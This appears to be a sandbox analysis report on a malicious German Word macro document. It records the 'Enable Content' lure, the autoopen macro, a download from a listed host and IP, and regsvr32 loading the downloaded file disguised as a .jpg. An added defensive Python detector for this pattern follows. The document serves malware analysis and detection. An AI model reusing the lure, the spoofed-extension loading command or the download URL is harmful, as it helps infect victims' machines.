
Analysis Report Datei-04.28.2021.doc

Overview

General Information

Sample Name: Datei-04.28.2021.doc
Analysis ID: 399362
MD5: 6747583727ce069aa8ae9d398d35e5bc
SHA1: 97667bf552bf5557666b5266003b0411bc1669bc
SHA256: 127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd

Detection

Score: 64 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Register DLL with spoofed extension
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2344 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • WINWORD.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • regsvr32.exe (PID: 2328 cmdline: regsvr32 c:\programdata\argumentSelectTmp.jpg MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Register DLL with spoofed extension
Source: Process started; Author: Joe Security
  • Command: regsvr32 c:\programdata\argumentSelectTmp.jpg
  • Image: C:\Windows\System32\regsvr32.exe (OriginalFileName: C:\Windows\System32\regsvr32.exe, ProcessId: 2328)
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE (ParentProcessId: 1552)
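The Sigma match above is the event a detection engineer would want to reproduce in their own pipeline. The Python below is an added example (not Joe Sandbox code and not the Sigma rule's own source) that implements the rule's logic, regsvr32 asked to register a file whose extension is not a DLL, together with the parent-process heuristic behind the "process start blacklist" signature, WINWORD.EXE spawning regsvr32.exe. It runs over constructed process-creation records that mirror the fields shown in the Sigma section; the first record reproduces this report's event, the other two are hypothetical. The allowed-extension set and the list of Office image names are assumptions made for the example.

```python
"""Detection logic for the two process-creation findings in this report:
the Sigma match "Register DLL with spoofed extension" (regsvr32 loading a
.jpg) and the "process start blacklist" hit (WINWORD.EXE spawning regsvr32).
Added example, not Joe Sandbox code. The event records below are constructed
to mirror the fields shown in the Sigma section; they are not raw telemetry."""
import ntpath
from dataclasses import dataclass

# Extensions regsvr32 is normally asked to register (assumption for this example).
DLL_EXTENSIONS = {".dll", ".ocx", ".ax"}
# Office host binaries whose child regsvr32 deserves an alert on its own (assumption).
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
REGSVR32_SWITCHES = {"/s", "/u", "/n", "/c"}  # /i:<arg> is handled by prefix below


@dataclass
class ProcessEvent:
    """Subset of a process-creation event (Sysmon EID 1 / Security 4688 style)."""
    image: str
    command_line: str
    parent_image: str
    process_id: int = 0
    parent_process_id: int = 0


def split_windows_cmdline(command_line):
    """Split a Windows command line on whitespace, honouring double quotes.
    Backslashes are ordinary characters here, unlike in POSIX shells."""
    tokens, current, in_quote = [], [], False
    for ch in command_line:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def regsvr32_targets(command_line):
    """Return the file arguments of a regsvr32 command line (switches removed)."""
    targets = []
    for token in split_windows_cmdline(command_line)[1:]:
        low = token.lower()
        if low in REGSVR32_SWITCHES or low.startswith("/i:"):
            continue
        targets.append(token)
    return targets


def image_name(path):
    return ntpath.basename(path).lower()


def spoofed_extension_targets(event):
    """Sigma 'Register DLL with spoofed extension': regsvr32 asked to load a
    file whose extension is not one it legitimately registers."""
    if image_name(event.image) != "regsvr32.exe":
        return []
    return [t for t in regsvr32_targets(event.command_line)
            if ntpath.splitext(t)[1].lower() not in DLL_EXTENSIONS]


def office_spawned_regsvr32(event):
    """The 'process start blacklist' heuristic: an Office host process
    spawning regsvr32 is abnormal regardless of the argument."""
    return (image_name(event.parent_image) in OFFICE_IMAGES
            and image_name(event.image) == "regsvr32.exe")


def evaluate(event):
    """Return the list of rule names an event triggers (empty if nothing fires)."""
    findings = []
    targets = spoofed_extension_targets(event)
    if targets:
        findings.append("Register DLL with spoofed extension: " + ", ".join(targets))
    if office_spawned_regsvr32(event):
        findings.append("Office application spawned regsvr32.exe")
    return findings


# Constructed sample events. The first reproduces the event in this report;
# the other two are hypothetical benign and borderline cases for contrast.
SAMPLE_EVENTS = [
    ProcessEvent(image=r"C:\Windows\System32\regsvr32.exe",
                 command_line=r"regsvr32 c:\programdata\argumentSelectTmp.jpg",
                 parent_image=r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
                 process_id=2328, parent_process_id=1552),
    ProcessEvent(image=r"C:\Windows\System32\regsvr32.exe",
                 command_line=r'regsvr32 /s "C:\Program Files\Vendor\control.ocx"',
                 parent_image=r"C:\Program Files\Vendor\setup.exe"),
    ProcessEvent(image=r"C:\Windows\System32\regsvr32.exe",
                 command_line=r"regsvr32 /s C:\Users\user\AppData\Local\Temp\addin.dll",
                 parent_image=r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"),
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event.command_line, "->", evaluate(event) or ["no finding"])
```

The extension check alone has a known blind spot: `regsvr32 /s /n /i:<url> scrobj.dll` keeps a legitimate `.dll` argument and passes it, which is why the parent-process rule is evaluated independently and fires for the third sample even though its argument is a real DLL. Expect the parent-process rule to need tuning for environments where Office add-in installers legitimately call regsvr32.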

Signature Overview


AV Detection:

Machine Learning detection for sample
Source: Datei-04.28.2021.doc; Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic; DNS query: name: better-transport-2008.com
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 45.142.215.160:80 (listed twice)
Source: global traffic; HTTP traffic detected (listed twice): GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
  • Accept: */*
  • UA-CPU: AMD64
  • Accept-Encoding: gzip, deflate
  • User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  • Host: better-transport-2008.com
  • Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B02F65D-537D-406E-B057-1B1541B1D39D}.tmp
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: better-transport-2008.com
Source: vbaProject.bin; String found in binary or memory: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2093810327.0000000003A30000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000004.00000002.2092951876.0000000001CD0000.00000002.00000001.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2093810327.0000000003A30000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number 8; Screenshot OCR (German, translated): "... 'Enable Editing' in the top bar and then 'Enable Content'." (the OCR also captured toolbar noise, omitted here)
Source: Document image extractions 0 and 1; OCR (German, translated): "... 'Enable Editing' in the top bar and then 'Enable Content'." (same lure text as the screenshot)
Source: Datei-04.28.2021.doc; OLE, VBA macro line: Sub autoopen()
Source: Datei-04.28.2021.doc; OLE indicator, VBA macros: true
Source: Datei-04.28.2021.doc; OLE indicator has summary info: false
Source: Datei-04.28.2021.doc; OLE indicator application name: unknown
Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
Source: classification engine; Classification label: mal64.expl.winDOC@4/12@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\Desktop\~$tei-04.28.2021.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRB2BB.tmp
Source: Datei-04.28.2021.doc; OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding (listed twice; two WINWORD.EXE instances, see Startup)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpg (listed twice)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Window found: window name: SysTabControl32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.2.dr; Initial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (71 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX (35 identical entries)
Source: C:\Windows\System32\regsvr32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 2876; Thread sleep time: -60000s >= -30000s

Mitre Att&ck Matrix

Techniques with at least one signature hit (the count in parentheses is the number of matching signatures; the rest of the matrix carries no hits and is omitted):

  • Execution: Scripting (2), Exploitation for Client Execution (13)
  • Privilege Escalation: Process Injection (1)
  • Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (1), Process Injection (1), Scripting (2)
  • Discovery: Virtualization/Sandbox Evasion (1), File and Directory Discovery (1), System Information Discovery (2)
  • Command and Control: Non-Application Layer Protocol (2), Application Layer Protocol (12), Ingress Tool Transfer (2)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source: Datei-04.28.2021.doc; Detection: 100%; Scanner: Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

URL: http://www.icra.org/vocabulary/.; Detection: 0%; Scanner: URL Reputation; Label: safe (listed three times)
URL: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4; Detection: 0%; Scanner: Avira URL Cloud; Label: safe
URL: http://www.%s.comPA; Detection: 0%; Scanner: URL Reputation; Label: safe (listed three times)
URL: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs; Detection: 0%; Scanner: Avira URL Cloud; Label: safe
URL: http://windowsmedia.com/redir/services.asp?WMPFriendly=true; Detection: 0%; Scanner: URL Reputation; Label: safe (listed three times)
URL: http://servername/isapibackend.dll; Detection: 0%; Scanner: Avira URL Cloud; Label: safe

Domains and IPs

Contacted Domains

Name: better-transport-2008.com; IP: 45.142.215.160; Active: true; Malicious: false; Reputation: unknown

Contacted URLs

URL: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown

URLs from Memory and Binaries

URL: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check; Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmp; Malicious: false; Reputation: high
URL: http://www.windows.com/pctv.; Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; Malicious: false; Reputation: high
URL: http://investor.msn.com; Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; Malicious: false; Reputation: high
URL: http://www.msnbc.com/news/ticker.txt; Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; Malicious: false; Reputation: high
URL: http://www.icra.org/vocabulary/.; Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe (three verdicts); Reputation: unknown
URL: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.; Source: regsvr32.exe, 00000004.00000002.2093810327.0000000003A30000.00000002.00000001.sdmp; Malicious: false; Reputation: high
URL: http://investor.msn.com/; Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; Malicious: false; Reputation: high
URL: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4; Source: vbaProject.bin; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
URL: http://www.%s.comPA; Source: regsvr32.exe, 00000004.00000002.2093810327.0000000003A30000.00000002.00000001.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe (three verdicts); Reputation: low
URL: http://windowsmedia.com/redir/services.asp?WMPFriendly=true; Source: regsvr32.exe, 00000004.00000002.2099682941.0000000004AF7000.00000002.00000001.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe (three verdicts); Reputation: unknown
URL: http://www.hotmail.com/oe; Source: regsvr32.exe, 00000004.00000002.2098041831.0000000004910000.00000002.00000001.sdmp; Malicious: false; Reputation: high
URL: http://servername/isapibackend.dll; Source: regsvr32.exe, 00000004.00000002.2092951876.0000000001CD0000.00000002.00000001.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: low

Contacted IPs

Public

IP: 45.142.215.160; Domain: better-transport-2008.com; Country: Russian Federation; ASN: 202933; ASN Name: CLOUDSOLUTIONSRU; Malicious: false

                  General Information

                  Joe Sandbox Version:32.0.0 Black Diamond
                  Analysis ID:399362
                  Start date:28.04.2021
                  Start time:17:58:35
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 0s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Datei-04.28.2021.doc
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Run name:Without Instrumentation
Number of new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal64.expl.winDOC@4/12@1/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .doc
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/399362/sample/Datei-04.28.2021.doc

                  Simulations

                  Behavior and APIs

Time: 17:59:43
Type: API Interceptor
Description: 1x Sleep call for process: regsvr32.exe modified

                  Joe Sandbox View / Context

                  IPs

Match: 45.142.215.160
• Datei-04.28.2021.doc (Detection: malicious)
• Datei-04.28.2021.doc (Detection: malicious)

                      Domains

Match: better-transport-2008.com
• Datei-04.28.2021.doc (Detection: malicious), Context: 45.142.215.160

                      ASN

Match: CLOUDSOLUTIONSRU
• Datei-04.28.2021.doc (Detection: malicious), Context: 45.142.215.160
• Datei-04.28.2021.doc (Detection: malicious), Context: 45.142.215.160
• richiedere-04.26.21.doc (Detection: malicious), Context: 45.142.215.164
• richiedere-04.26.21.doc (Detection: malicious), Context: 45.142.215.164
• richiedere-04.26.21.doc (Detection: malicious), Context: 45.142.215.164
• verschreiben.04.26.2021.doc (Detection: malicious), Context: 45.142.215.163
• verschreiben.04.26.2021.doc (Detection: malicious), Context: 45.142.215.163
• verschreiben.04.26.2021.doc (Detection: malicious), Context: 45.142.215.163
• 3IsEcDekqj.exe (Detection: malicious), Context: 45.142.215.63
• Handel-04.20.2021.doc (Detection: malicious), Context: 45.142.215.16
• Handel-04.20.2021.doc (Detection: malicious), Context: 45.142.215.16
• der Vorschlag.04.21.doc (Detection: malicious), Context: 45.142.215.16
• der Vorschlag.04.21.doc (Detection: malicious), Context: 45.142.215.16
• der Vorschlag.04.21.doc (Detection: malicious), Context: 45.142.215.16
• zu erzaehlen.doc (Detection: malicious), Context: 45.142.215.32
• zu erzaehlen.doc (Detection: malicious), Context: 45.142.215.32
• zu erzaehlen.doc (Detection: malicious), Context: 45.142.215.32
• verschreiben 04.16.2021.doc (Detection: malicious), Context: 45.142.215.32
• verschreiben 04.16.2021.doc (Detection: malicious), Context: 45.142.215.32
• verschreiben 04.16.2021.doc (Detection: malicious), Context: 45.142.215.32

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\argumentSelectTmp.jpg
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:HTML document, ASCII text
                      Category:dropped
                      Size (bytes):204
                      Entropy (8bit):5.134216527532146
                      Encrypted:false
                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                      MD5:FEDDB78986726A4A2161D362A5D52F25
                      SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                      SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                      SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                      Malicious:false
                      Reputation:low
                      Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\laka4[1].htm
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:HTML document, ASCII text
                      Category:downloaded
                      Size (bytes):204
                      Entropy (8bit):5.134216527532146
                      Encrypted:false
                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                      MD5:FEDDB78986726A4A2161D362A5D52F25
                      SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                      SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                      SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                      Malicious:false
                      Reputation:low
                      IE Cache URL:http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs
                      Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73886A23.jpeg
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:[TIFF image data, little-endian, direntries=14, height=630, bps=182, compression=LZW, PhotometricIntepretation=RGB, orientation=upper-left, width=2288], baseline, precision 8, 828x186, frames 3
                      Category:dropped
                      Size (bytes):79188
                      Entropy (8bit):7.847381222647767
                      Encrypted:false
                      SSDEEP:1536:3hdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6eh:MlZAPY2yWwb3ZadaxHeuNQpeh
                      MD5:A1BAC07A20C5DF390D6D96B0FB713F5D
                      SHA1:427F044786B5C412EF3B424CDA2DEA817AA9CCA6
                      SHA-256:0638205EBB792E3447169B46FBFB6BC48A1433B8335794ED4CEB6706F5290EF3
                      SHA-512:1EBB00551E59417AA5CC16D195E27EE227342108C4C093D9A747241BAC6AC54A48262686AD3911DFDCF89AA1EA3E2A1C91CAE790252A5C2C81978F362CCA2BA1
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: .....xExif..II*...........................v...................................................................................................(...........1...........2...........i...........0................'.......'..Adobe Photoshop 22.2 (Windows).2021:04:08 01:34:08..........................<...........................................~...............(.......................................H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................$...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......S.,.2....}....sC.:.....k..}OS.6~..?Yz.......}M...|....
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:Microsoft Word 2007+
                      Category:dropped
                      Size (bytes):20515
                      Entropy (8bit):7.469835486287775
                      Encrypted:false
                      SSDEEP:384:Pjl/SU5NrbWwV+A9QG6F7//oMaoNy3aPWPOzROejkIQMAPZU:LrPlo1k3aPWPONjkIFAK
                      MD5:747F920591F171BA793209DB3BFD8A21
                      SHA1:BCF601F9500A6B5C20DB101840F4288D685FC57D
                      SHA-256:74C3C074A163990B2E25692F8656F2232B9D4B07D0B34FE7A3F40127F6838CF3
                      SHA-512:0D37436D7BF6BF640377525F7E2E926929B64C5D31686B4CF69083CCCDF53AC4F85F98BF380D49DE9B585055237FA9156D696C81081B676364771F2415790683
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: PK..........!.+:.P............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g..6@]t.#.._.0..}......QM.l..1....5...YS.@D.].....I..[....k..U..S.x.-......7..6.V..e...'.Qn..l|.Go:..Ht..<.y%....f.....Ku..l1....6.Z...=I......0{.L.`...H..S.\.CC..op...#..O:.7....Si.VP]....K...G...rh.......$....BF.t..Z.y.]O..+...,..{.j.uZ...qB...i..i.....t.,..$-my.{...q7H..JL..{P.E..../Fq$>...FX.)...b...k..E.Ni..0C..^.P..7z`.......E<......)...G.]....9./......g...I4...g....<eI[."..4m.?.6.q..k
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{490043CF-DA25-4B44-A5F3-281D3BE3AC4A}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1536
                      Entropy (8bit):0.1903644670878318
                      Encrypted:false
                      SSDEEP:3:/lMlt4slllFlNtwl5h9Z9:+lr45v
                      MD5:43EADFFEFD5914B486C8193474EA3408
                      SHA1:048972F9F902493E595F848E45052DF938621907
                      SHA-256:46F3BCD8D35DE83BDD29CA5C831E78C421869E3D4D0F8DDD60CD2A9E8E60ED77
                      SHA-512:11BBE96AFE28472C497DC7252560D77B9595C904C2253881AC407DFD5F23A3D4EA29526DB4DCA242B074D83217459D10FB428ACF92B934C17C286E73A87A3338
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{905296D0-886E-495C-BACA-6A30C1B9E4F3}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1024
                      Entropy (8bit):0.05390218305374581
                      Encrypted:false
                      SSDEEP:3:ol3lYdn:4Wn
                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
